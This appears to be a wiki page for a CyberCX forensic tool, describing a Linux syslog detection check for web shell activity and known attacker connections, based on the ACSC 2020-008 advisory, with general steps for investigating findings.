Linux Logs [0.1]
Findings by this artefact indicate suspicious log entries which may suggest web shell activity or attempted access from known malicious origins.
This search aims to identify any activity within syslog files which may be indicative of webshell activity on the web server, or if specific known attackers have attempted to connect to the web server.
A webshell is a malicious webpage injected by an attacker onto a web server which is used to remotely access and launch further attacks.
This scan parses syslog files for any suspicious entries which may be indicative of attacker activity. This includes specific commands which are characteristic of a webshell. Many webshell variants exist, but can typically be characterised by the ability to be uploaded to a web server with the intent of remote access to establish, escalate or maintain persistence on a system.
This search looks for any files which may suggest the presence of web shells as identified within the ACSC 2020-008 advisory, using intelligence released by the ACSC as TLP:WHITE, and by other sources such as CyberCX and CrowdStrike investigations. See the threat intelligence sources section below for further details.
Findings are derived from threat intelligence, and do not consider factors specific to your computer or network environment.
Packs.CyberCX.Linux.Logs
The Threat intelligence sources used to develop these detections include:
- Those provided by the ACSC advisory 2020-008 on ‘Copy and Paste’ attacks and released as Traffic Light Protocol (TLP): White.
- Investigations performed by the CyberCX DFIR team
- Investigations performed by CrowdStrike
- Contributions from the community
Any findings may not indicate confirmed compromise of your system, but might well be indicative of attacker activity. It is recommended to review each detection contextually to confirm if the finding is definitively malicious or a false positive. Guidance for how to approach these investigations is provided within this section.
This section provides general guidance on how to determine if a finding is indicative of malicious activity. Please note the specific detection results within the report generated by CCX Digger when conducting the investigation, as some of the content below may not be applicable for your system.
These guides do not consider contextual usage, such as environment, applications and expected activity for the computer. The review should consider what activity is expected in conjunction with webshell file detection results.
The entries identified should be investigated further to confirm the origin and context of the event. The following should be performed:
- Confirm that the behaviour is expected for the user's role and intended functionality, should a username be present
If the event was unexpected, or origin unknown, further action should be taken to determine what has been performed.
The following activities should be performed to determine if an attack may have occurred:
- Check to see if the event was successful.
- Identify any information that may have been returned, and investigate what that may relate to. This could include specific host details, user accounts, or directories.
- Conduct further investigation on the activity based on the command issued, or the connecting IP address, to determine if either are connected to any particular attacks, vulnerabilities, or attack groups.
If you have followed the investigations to confirm the validity of the findings, and believe your system may be at risk, please visit the Need Help? page for further instructions. Please refer to the same page for further context on how to use this wiki.
[v0.1]:
